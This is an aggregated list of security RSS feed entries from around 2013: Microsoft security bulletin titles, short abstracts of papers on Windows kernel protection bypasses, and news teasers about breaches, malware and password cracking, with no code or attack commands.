http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This toolkit provides proven methods that your organization can use to effectively monitor the compliance state of recommended security baselines for Windows Vista, Windows XP Service Pack 2 (SP2), and Windows Server 2003 SP2.

==> Security Risk Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Security Risk Management Guide helps customers plan, build, and maintain a successful security risk management program.

==> SQL Server 2008 Compliance Guidance

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The SQL Server 2008 Compliance Guidance white paper is a complement to the SQL Server 2008 compliance software development kit (SDK).

==> Microsoft Security Assessment Tool

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Microsoft Security Assessment Tool (MSAT) consists of more than 200 questions designed to help identify and address security risks in IT environments. It includes best practices, standards such as ISO 17799, 27001 and NIST-800.x, as well as recommendations from the Microsoft Trustworthy Computing Group.

==> Microsoft Security Advisory (2854544): Update to Improve Cryptography and Digital Certificate Handling in Windows - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-051 - Important : Vulnerability in Microsoft Office Could Allow Remote Code Execution (2839571) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-050 - Important : Vulnerability in Windows Print Spooler Components Could Allow Elevation of Privilege (2839894) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-049 - Important : Vulnerability in Kernel-Mode Driver Could Allow Denial of Service (2845690) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-048 - Important : Vulnerability in Windows Kernel Could Allow Information Disclosure (2839229) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-047 - Critical : Cumulative Security Update for Internet Explorer (2838727) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Advance Notification for June 2013 - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-040 - Important : Vulnerabilities in .NET Framework Could Allow Spoofing (2836440) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-038 - Critical : Security Update for Internet Explorer (2847204) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-069 - Important : Vulnerability in Kerberos Could Allow Denial of Service (2743555) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-044 - Important : Vulnerability in Microsoft Visio Could Allow Information Disclosure (2834692) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-037 - Critical : Cumulative Security Update for Internet Explorer (2829530) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for May 2013 - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-081 - Critical : Vulnerability in Windows File Handling Component Could Allow Remote Code Execution (2758857) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-045 - Important : Vulnerability in Windows Essentials Could Allow Information Disclosure (2813707) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2846338): Vulnerability in Microsoft Malware Protection Engine Could Allow Remote Code Execution - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2820197): Update Rollup for ActiveX Kill Bits - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-046 - Important : Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege (2840221) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-043 - Important : Vulnerability in Microsoft Word Could Allow Remote Code Execution (2830399) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-042 - Important : Vulnerabilities in Microsoft Publisher Could Allow Remote Code Execution (2830397) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-041 - Important : Vulnerability in Lync Could Allow Remote Code Execution (2834695) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-039 - Important : Vulnerability in HTTP.sys Could Allow Denial of Service (2829254) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2847140): Vulnerability in Internet Explorer Could Allow Remote Code Execution - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-009 - Critical : Cumulative Security Update for Internet Explorer (2792100) - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2755801): Update for Vulnerabilities in Adobe Flash Player in Internet Explorer 10 - Version: 12.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-043 - Critical : Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (2722479) - Version: 4.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-036 - Important : Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege (2829996) - Version: 3.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-031 - Important : Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2813170) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-028 - Critical : Cumulative Security Update for Internet Explorer (2817183) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for April 2013 - Version: 3.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-034 - Important : Vulnerability in Microsoft Antimalware Client Could Allow Elevation of Privilege (2823482) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-029 - Critical : Vulnerability in Remote Desktop Client Could Allow Remote Code Execution (2828223) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-035 - Important : Vulnerability in HTML Sanitization Component Could Allow Elevation of Privilege (2821818) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-033 - Important : Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of Privilege (2820917) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-032 - Important : Vulnerability in Active Directory Could Lead to Denial of Service (2830914) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-030 - Important : Vulnerability in SharePoint Could Allow Information Disclosure (2827663) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-022 - Critical : Vulnerability in Silverlight Could Allow Remote Code Execution (2814124) - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-007 - Important : Vulnerability in Open Data Protocol Could Allow Denial of Service (2769327) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-027 - Important : Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege (2807986) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2819682): Security Updates for Microsoft Windows Store Applications - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-026 - Important : Vulnerability in Microsoft Office for Mac Could Allow Information Disclosure (2813682) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-023 - Critical : Vulnerability in Microsoft Visio Viewer 2010 Could Allow Remote Code Execution (2801261) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for March 2013 - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-025 - Important : Vulnerability in Microsoft OneNote Could Allow Information Disclosure (2816264) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-024 - Critical : Vulnerabilities in SharePoint Could Allow Elevation of Privilege (2780176) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-021 - Critical : Cumulative Security Update for Internet Explorer (2809289) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-003 - Important : Vulnerabilities in System Center Operations Manager Could Allow Elevation of Privilege (2748552) - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for January 2013 - Version: 4.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-034 - Critical : Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight (2681578) - Version: 1.6

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-020 - Critical : Vulnerability in OLE Automation Could Allow Remote Code Execution (2802968) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> The WOW-Effect: Imho something the IT-Security community should be aware of ...

http://www.offensivecomputing.net/?q=node/feed Dear like-mindeds, we (CERT.at, the Austrian National Computer Emergency Response Team) just released our latest paper which addresses an issue with Microsoft Windows 64-bit that has high potential to affect the IT-Security community. Especially those dealing with malware analysis and accordingly investigations. It's even possible that some of us already are or were affected but just didn't notice. The goal of my paper is to raise the IT-Security community's awareness regarding this issue. In short: this issue - I call it the "WOW-Effect" - is a so to say unintentional implication of Microsoft's WOW64 technology and the according redirection functionality. You can find the paper on our website. If you have any questions regarding the "WOW-Effect" or would like to give me some feedback feel free to contact me via wojner_at_cert.at. Here's the link to the paper: http://cert.at/downloads/papers/wow_effect_en.html Enjoy reading! Cheers, Christian Wojner CERT.at

==> PatchGuard Reloaded: A Brief Analysis of PatchGuard Version 3

http://www.uninformed.org/uninformed.rss Since the publication of previous bypass or circumvention techniques for Kernel Patch Protection (otherwise known as "PatchGuard"), Microsoft has continued to refine their patch protection system in an attempt to foil known bypass mechanisms. With the release of Windows Server 2008 Beta 3, and later a full-blown distribution of PatchGuard to Windows Vista / Windows Server 2003 via Windows Update, Microsoft has introduced the next generation of PatchGuard to the general public ("PatchGuard 3"). As with previous updates to PatchGuard, version three represents a set of incremental changes that are designed to address perceived weaknesses and known bypass vectors in earlier versions. Additionally, PatchGuard 3 expands the set of kernel variables that are protected from unauthorized modification, eliminating several mechanisms that might be used to circumvent PatchGuard while co-existing (as opposed to disabling) it. This article describes some of the changes that have been made in PatchGuard 3. This article also proposes several new techniques that can be used to circumvent PatchGuard's defenses. Countermeasures for these techniques are also discussed.

==> Getting out of Jail: Escaping Internet Explorer Protected Mode

http://www.uninformed.org/uninformed.rss With the introduction of Windows Vista, Microsoft has added a new form of mandatory access control to the core operating system. Internally known as "integrity levels", this new addition to the security manager allows security controls to be placed on a per-process basis. This is different from the traditional model of per-user security controls used in all prior versions of Windows NT. In this manner, integrity levels are essentially a bolt-on to the existing Windows NT security architecture. While the idea is theoretically sound, there does exist a great possibility for implementation errors with respect to how integrity levels work in practice. Integrity levels are the core of Internet Explorer Protected Mode, a new "low-rights" mode where Internet Explorer runs without permission to modify most files or registry keys. This places both Internet Explorer and integrity levels as a whole at the forefront of the computer security battle with respect to Windows Vista.

==> Subverting PatchGuard Version 2

http://www.uninformed.org/uninformed.rss Windows Vista x64 and recently hotfixed versions of the Windows Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode patch prevention technology known as PatchGuard. This new version of PatchGuard improves on the previous version in several ways, primarily dealing with attempts to increase the difficulty of bypassing PatchGuard from the perspective of an independent software vendor (ISV) deploying a driver that patches the kernel. The feature-set of PatchGuard version 2 is otherwise quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and several kernel global function pointer variables (as well as kernel code) are guarded against unauthorized modification. This paper proposes several methods that can be used to bypass PatchGuard version 2 completely.

==> REVIEW: “Consent of the Networked”, Rebecca MacKinnon

http://blogs.securiteam.com/index.php/feed/ BKCNSNTW.RVW 20121205 “Consent of the Networked”, Rebecca MacKinnon, 2012, 978-0-465-02442-1, U$26.99/C$30.00 %A Rebecca MacKinnon %C 387 Park Ave. South, New York, NY 10016-8810 %D 2012 %G 978-0-465-02442-1 0-465-02442-1 %I Basic Books %O U$26.99/C$30.00 special.markets@perseusbooks.com %O http://www.amazon.com/exec/obidos/ASIN/0465024421/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/0465024421/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/0465024421/robsladesin03-20 %O Audience n Tech 1 Writing 1 (see revfaq.htm for explanation) %P 294 p. %T “Consent [...]

==> Nopcon 2013 is here

http://blogs.securiteam.com/index.php/feed/ Douglas Adams is still right: No language has the phrase "As pretty as an airport." But in my humble opinion, airports have come a long way in the last 10 years. Or maybe my expectations have become so low, I can’t be disappointed. Either way, it seems to me going through an airport isn’t as [...]

==> Risk analysis, traffic analysis, and unusual factors

http://blogs.securiteam.com/index.php/feed/ Canadian terrorists strike again: apparently we are responsible for taking down a major piece of transportation infrastructure, vis, the I-5 bridge over the Skagit river at Mount Vernon. A friend in Seattle assures me that, while he is disappointed in us, he holds no grudges, and is willing to warn us if he hears of [...]

==> REVIEW: “Cloud Crash”, Phil Edwards

http://blogs.securiteam.com/index.php/feed/ BKCLDCRS.RVW 20101009 “Cloud Crash”, Phil Edwards, 2011, 978-1466408425, U$9.99 %A Phil Edwards PhilEdwardsInc.com philipjedwards@gmail.com %C Seattle, WA %D 2011 %G 978-1466408425 1466408421 %I CreateSpace Independent Publishing Platform/Amazon %O U$9.99 %O http://www.amazon.com/exec/obidos/ASIN/1466408421/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/1466408421/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/1466408421/robsladesin03-20 %O Audience n Tech 2 Writing 1 (see revfaq.htm for explanation) %P 386 p. %T “Cloud Crash” To a background of [...]

==> Fake security can hurt you …

http://blogs.securiteam.com/index.php/feed/ “Fraudster James McCormick has been jailed for 10 years for selling fake bomb detectors. … One invoice showed sales of 38m over three years to Iraq, the judge said.” http://www.bbc.co.uk/news/uk-22380368 Closer to our technical field, we know about the pure fraud of fake AV, of course. And there are plenty of companies out there selling [...]

==> Why BC holds the record for “World’s Weirdest Politicians”

http://blogs.securiteam.com/index.php/feed/ Whenever political pundits get together, they all start the competition for “our politicians are more corrupt/venal/just plain weird than yours.” Whenever anyone from BC enters the fray, everyone else concedes. Herewith our latest saga. The ruling “Today’s BC Liberal Party” is finding itself polling behind the NDP. (Do not let the word “liberal” in the [...]

==> REVIEW: “World War Hack”, Ethan Bull/Tsubasa Yozora

http://blogs.securiteam.com/index.php/feed/ BKWWHACK.RVW 20121009 “World War Hack”, Ethan Bull/Tsubasa Yozora, 2012, 978-0-9833670-8-6 %A Ethan Bull %A Tsubasa Yozora %C 9400 N. MacArthur Blvd., Suite 124-215, Irving, TX 75063 %D 2012 %E Gwendolyn Borgen %G 978-0-9833670-8-6 0-9833670-8-6 %I Viper Entertainment Inc./Viper Comics %O U$7.95 wyatt@worldwarhack.com www.worldwarhack.com %O http://www.amazon.com/exec/obidos/ASIN/0983367086/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/0983367086/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/0983367086/robsladesin03-20 %O Audience n- Tech 1 Writing 1 [...]

==> M-ETH: Man in the middle – Ethernet

http://blog.wintercore.com/?feed=rss2 Over a year ago I presented at LaCon'09 a custom PCI NIC which allows performing a man-in-the-middle of the whole network traffic flowing through the device. The idea behind this PCI card is that once it is plugged into a computer the whole traffic can be inspected, analyzed and, of course, modified when required in [...]

==> Vulnerability Engineering

http://blog.wintercore.com/?feed=rss2 In this article we are going to use some metrics from Software Engineering and apply them to the Vulnerability Research World. We are going to define a new term which will allow us to get a probability showing how likely an application is to have a vulnerability during its lifetime and also will give an idea [...]

==> See Artica Demo Client and IceSphere in action

http://blog.wintercore.com/?feed=rss2 Download Video (24 mb) Do not hesitate to contact us if you need further information

==> Motorola Timbuktu’s Internet Locator Service real-time data exposed to public

http://blog.wintercore.com/?feed=rss2 We just want to make a public warning to those users of Motorola/Netopia Timbuktu Remote Control Software who are using the Internet Locator service. This service allows locating any Timbuktu user just by knowing the email. More than five months ago we notified Netopia's customer support (http://blog.wintercore.com/2008/04/26/things-that-shouldnt-be-there/), after discovering a hardcoded user/password pair within [...]

==> Toward a new generation of audio captchas

http://blog.wintercore.com/?feed=rss2 It seems the post "Breaking Gmail's audio Captcha" has been slashdotted so many interesting discussions have emerged as a result. It's worth noting that there is nothing specially exciting in the approach used to break the google audio captcha, merely a bunch of signal analysis and pattern recognition principles applied. Almost any Voice Recognition / [...]

==> Things that shouldn’t be there

http://blog.wintercore.com/?feed=rss2 Some days ago we released a security advisory for Realtek - curious note: according to Secunia, it is the first advisory for that vendor - where a piece of code that was originally intended to be used by the engineers only ends up being compiled in the release driver. Obviously, there is no reason to think about this [...]

==> Breaking Gmail’s Audio Captcha

http://blog.wintercore.com/?feed=rss2 A week ago I came across this interesting post at the Websense blog, anyway I guess everybody is already aware that a bot was spotted breaking Gmail's image captcha. According to the post, the success rate is about 20%, which from a spammer's point of view is really profitable and sure more than enough for its [...]

==> UK Is Sixth In The World As Cyber Crime Target, Cyber Security Is Not Marketed Enough

http://cyberinsecure.com/feed/ It has been suggested by UK ministers recently that there should be better awareness of the importance of cyber security. Although conventionally, it is the more traditional generations that are wary of sharing their details in the new digital world, it is perhaps not such a bad thing to be more cautious. Jim Murphy, the Shadow [...]

==> Hijacked High-Ranked Sites Serve Malicious, Illegal Content, Blacklisted By Google

http://cyberinsecure.com/feed/ Researchers have found that Google Safe Browsing has blacklisted a number of legitimate sites after they’ve been hijacked and set up to serve malicious or illegal content. Many of them are ranked high, according to Alexa. Zscaler experts have scanned the first 1 million websites found in the Alexa top and found that 621 of [...]

==> Apple Plugs Java Hole After Flashback Trojan Creates 550,000 Strong Mac Botnet

http://cyberinsecure.com/feed/ Apple released a security update for OS X Java on Tuesday, plugging a security vulnerability exploited by the latest Flashback Trojan. The latest variant of the Mac-specific malware appeared on Monday and targeted a vulnerability in Java (CVE-2012-0507) which was patched on Windows machines more than six weeks ago. Apple’s new version of Java for [...]

==> Free Malware Scanning Service SiteInspector Launched By Comodo

http://cyberinsecure.com/feed/ Security solutions provider Comodo released a free service called SiteInspector, designed to scan websites for pieces of malware and compare them against a range of blacklisting services, such as the ones offered by Google Safe Browsing, PhishTank or Malwaredomainlist. Drive-by-download malware attacks launched from websites that fall victim to mass infections are highly common these [...]

==> US Army CECOM Website Breached, 30 Record Sets With User IDs, Clear-text Passwords, Private Data Posted On Pastebin

http://cyberinsecure.com/feed/ Black Jester, the hacker who yesterday demonstrated that he managed to gain unauthorized access to a NASA site, leaked sensitive contract information from a site connected to the US Army Communications and Electronics Command (CECOM). A number of 30 record sets that include names, user IDs, physical addresses, email addresses, telephone numbers, and clear-text passwords [...]

==> Scareware Makes Files And Folders Invisible, Demands Ransom For Repair Utility

http://cyberinsecure.com/feed/ Bitdefender experts came across a piece of scareware that makes victims believe that something may have happened to all the files and folders stored on their computers. The user is then requested to pay $80 (60 EUR) for a tool that allegedly addresses the problem. Scareware or ransomware is not uncommon, many security solutions providers [...]

==> US Security Firm Stratfor Hit By ‘Anonymous’, Clients Credit Cards And Passwords Stolen

http://cyberinsecure.com/feed/ The hacking group “Anonymous” on Sunday Christmas claimed it has stolen thousands of credit card numbers and personal information of clients of the U.S. based security think-tank Stratfor and pilfered funds it gave away as Christmas donations to charity. Anonymous said it stole information from organizations and individuals that were clients of Stratfor, including Apple [...]

==> Ultimate Bet Players Accounts Compromised, 3.5 Million Records Freely Available Online For Weeks Still In Google Cache

http://cyberinsecure.com/feed/ In a breach of security at Ultimate Bet, information from every player's account had been publicly posted on the internet, revealing personal information of approximately 3.5 million poker players holding accounts at the nearly-dead poker site. A popular poker forum website posted a link to the account information via an anonymous posting, but removed the [...]

==> Restaurant Depot, Jetro Cash & Carry Processing System Compromised, Credit Cards Sold On Russian Blackmarket

http://cyberinsecure.com/feed/ If you used a credit card between the dates of Sept. 21 and Nov. 18th at national restaurant wholesalers Restaurant Depot or Jetro Cash & Carry, then you should probably know that Russian cyberthugs wearing leather blazers and gold chains and stinking of Armani Aqua di Gio are currently selling your information on the black [...]

==> InternationalCheckout.com Database Hacked, Customers Credit Cards Abused

http://cyberinsecure.com/feed/ International Checkout customers began receiving emails that alert them on the fact that the organization has recently fallen victim to a cyberattack which resulted in the theft of a large quantity of personal information, including credit card details. International Checkout was recently the victim of a system intruder who was able to access encrypted credit [...]

==> Software Offered By CNET Bundled With Trojans, Spread Through Download.com

http://cyberinsecure.com/feed/ One of the developers of a network exploration and security auditing tool called Nmap is accusing CNET of bundling free software with Trojans and shady toolbars, and serving them on their Download.com website. Gordon Lyon, also known as Fyodor claims he discovered that Nmap and other free applications such as VLC are downloaded with pieces [...]

==> Unpatched Yahoo! Messenger Flaw Allows Status Updates Remote Hijacking

http://cyberinsecure.com/feed/ Security researchers have discovered an unpatched flaw in Yahoo! Messenger that allows miscreants to change any user’s status message. Hijacked status updates are a handy way to persuade a victim’s contacts to click on a link and lead them to a dangerous website. Worse still, the bug in version 11.x of the Messenger client requires [...]

==> Adidas Websites Taken Down After Attack, Adidas.com, Reebok.com Affected

http://cyberinsecure.com/feed/ The popular sports equipment maker took down some of its websites after a security breach that targeted their network was discovered on November 3. The affected locations include adidas.com, reebok.com, miCoach.com, adidas-group.com and some local e-commerce shops. They were all taken down in order to protect the individuals that might visit them. Our preliminary investigation [...]

==> Private Canadian Children’s Ministry Papers Dumped In Trash, Contain Names, Addresses, Birth Dates

http://cyberinsecure.com/feed/ The B.C. government is dealing with another privacy breach after confidential documents from the Ministry of Children and Family Development were found dumped in a garbage bin. The documents were discovered dumped in a green dumpster behind a Victoria apartment building last week, and contain client names, addresses, birth dates and health card numbers. At [...]

==> Numerous Defense And Chemical Firms Targeted In Industrial Espionage Campaign

http://cyberinsecure.com/feed/ Dozens of companies in the defense and chemical industries have been targeted in an industrial espionage campaign that steals confidential data from computers infected with malware, researchers from Symantec said. At least 29 companies involved in the research, development, and manufacture of chemicals and an additional 19 firms in defense and other industries have been [...]

==> Phishing Campaign Fake Legitimate Apple Emails, Steals Victims ID And Password

http://cyberinsecure.com/feed/ A phishing campaign which involves the reputation of Apple has been seen invading inboxes. The rogue message perfectly replicates alerts received by customers when the company notifies them on changes of their accounts. A Trend Micro researcher came across a message that looked very much like the genuine message he had received not long ago [...]

==> osCommerce Compromised Sites Distribute ZeuS Spin-off Trojan, Millions Of Pages Infected

http://cyberinsecure.com/feed/ Security researchers warn that variants of a ZeuS spin-off trojan called Ice-IX are being distributed from osCommerce websites compromised during a recent mass injection attack. The attack targeting osCommerce installations vulnerable to a flaw that dates from November 2010 began at the end of July. The code injection campaign escalated quickly and the number of [...]

==> Data From 56 Law Enforcement Agencies Stolen By Antisec, 10GBs Of Emails From 300 Accounts Posted Online

http://cyberinsecure.com/feed/ Hackers associated with Anonymous’ Operation Antisec have leaked a massive cache of personal records, email messages and confidential documents belonging to law enforcement agencies. The data was obtained recently when the group hacked into a server housing 77 websites belonging to county sheriff offices and other local law enforcement organizations. The leak has been posted [...]

==> US Government Contractor ManTech Hacked, Confidential Documents Stolen And Posted Online

http://cyberinsecure.com/feed/ Anonymous has published around 400 MB of confidential documents involving ManTech, a large federal contractor which provides IT solutions to many government departments. The hacktivist collective announced plans to release the files yesterday and even posted some teaser samples to prove it means business. The full archive was eventually released in true Anonymous style, with [...]

==> U.S. Military Contractor Booz Allen Hamilton Hacked, Emails And Sensitive Data Exposed

http://cyberinsecure.com/feed/ Hackers affiliated with the Anonymous collective and its Antisec campaign have hacked into computer systems belonging to U.S. military contractor Booz Allen Hamilton and leaked sensitive data found inside. The hackers described the attack in the description of a torrent posted on ThePirateBay which also contains a list of 90,000 email addresses belonging to military [...]

==> Definitively Moved to Blogspot

http://evilcodecave.wordpress.com/feed/ Definitively Moved to Blogspot www.evilcodecave.blogspot.com

==> Fast Overview of SpyEye

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2010/02/fast-overview-of-spyeye.html

==> Rootkit Agent.adah Anatomy and Executables Carving via Cryptoanalytical Approach

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2010/01/rootkit-agentadah-anatomy-and.html

==> PHP/Spy.Bull Cryptanalysis of Encryption used and Threat Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/12/phpspybull-cryptanalysis-of-encryption.html

==> Siberia ExploitPack and PDF Exploit Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/12/siberia-exploitpack-and-pdf-exploit.html

==> DNAScan Malicious Network Activity Reverse Engineering

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/dnascan-malicious-network-activity.html

==> Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/avast-aswrdrsys-kernel-pool-corruption.html

==> PHPSpyScanBot Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/phpspyscanbot-analysis.html

==> [Crimeware] Researches Reversing about Eleonore Exploit Pack

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/crimeware-researches-about-eleonore.html

==> [Crimeware] Researches and Reversing about Eleonore Exploit Pack

http://evilcodecave.wordpress.com/feed/

==> Behold, the world’s most sophisticated Android trojan

http://feeds.arstechnica.com/arstechnica/security?format=xml Obad.a exploits undocumented Android bugs and offers advanced features.

==> Under draft bill, EU wants to raise jail time for hackers, botnet operators

http://feeds.arstechnica.com/arstechnica/security?format=xml Minimum sentences of 3 years for botnets, 5 years for damaging "infrastructure."

==> After burglaries, mystery car unlocking device has police stumped

http://feeds.arstechnica.com/arstechnica/security?format=xml Southern California cops can't figure out how keyless entry device works.

==> Dutch public transportation may be hackable with an Android smartphone

http://feeds.arstechnica.com/arstechnica/security?format=xml Two Android apps may be able to crack the RFID chip inside fare smartcards.

==> More than 360,000 Apache websites imperiled by critical Plesk vulnerability (Updated)

http://feeds.arstechnica.com/arstechnica/security?format=xml Publicly available attack code exploits remote-code bug in Plesk admin panel.

==> Mac OS X update protects users against CRIME attacks

http://feeds.arstechnica.com/arstechnica/security?format=xml Attacks allow hackers to hijack some browsing sessions protected by HTTPS.

==> Espionage malware infects raft of governments, industries around the world

http://feeds.arstechnica.com/arstechnica/security?format=xml "NetTraveler" stole data on space exploration, nanotechnology, energy, and more.

==> Password crackers go green by immersing their GPUs in mineral oil

http://feeds.arstechnica.com/arstechnica/security?format=xml Dunking a powered-on PC in cooling liquid may seem crazy, but not for KoreLogic.

==> The secret to online safety: Lies, random characters, and a password manager

http://feeds.arstechnica.com/arstechnica/security?format=xml Or, how to go from "123456" to "XBapfSDS3EJz4r42vDUt."

==> Ars readers react: cracking passwords with 90 percent success

http://feeds.arstechnica.com/arstechnica/security?format=xml The Ars community gawks at Google's Go, wonders about the fate of wolves.

==> Someday you may ditch your two-factor authenticator for an electronic tattoo

http://feeds.arstechnica.com/arstechnica/security?format=xml Dongles aren't cool. Know what's cool? Tattoos and password pill addictions.

==> Yahoo Mail reportedly loses key customer following mass hack attack

http://feeds.arstechnica.com/arstechnica/security?format=xml Memo to Marissa Mayer: Security is key to your plan to revive Yahoo.

==> iCloud users take note: Apple two-step protection won’t protect your data

http://feeds.arstechnica.com/arstechnica/security?format=xml Limitations could leave users open to the type of hack that hit Wired's Mat Honan.

==> Drupal.org resets login credentials after hack exposes password data

http://feeds.arstechnica.com/arstechnica/security?format=xml Passwords for almost 1 million accounts affected after malicious files are found.

==> Critical Ruby on Rails bug exploited in wild, hacked servers join botnet

http://feeds.arstechnica.com/arstechnica/security?format=xml Attackers' success shows many servers still aren't patched. Is yours?

==> Anatomy of a hack: How crackers ransack passwords like “qeadzcwrsfxv1331”

http://feeds.arstechnica.com/arstechnica/security?format=xml For Ars, three crackers have at 16,000+ hashed passcodes with 90 percent success.

==> Google builds bigger crypto keys to make site forgeries harder

http://feeds.arstechnica.com/arstechnica/security?format=xml No one has cracked a 1024-bit key yet, but Google isn't taking any chances.

==> Twitter launches two-factor authentication, too late to save The Onion

http://feeds.arstechnica.com/arstechnica/security?format=xml Login authentication aims to stem flood of accounts exposed by phishing attacks.

==> Power company targeted by 10,000 cyberattacks per month

http://feeds.arstechnica.com/arstechnica/security?format=xml Electric grid is under daily assault, Congressional report finds.

==> Reporters use Google, find breach, get branded as “hackers”

http://feeds.arstechnica.com/arstechnica/security?format=xml Scripps reporters uncover mishandling of customer data; companies threaten to sue.

==> Chinese hackers who breached Google reportedly targeted classified data

http://feeds.arstechnica.com/arstechnica/security?format=xml Breach exposed thousands of surveillance orders for suspected spies, terrorists.

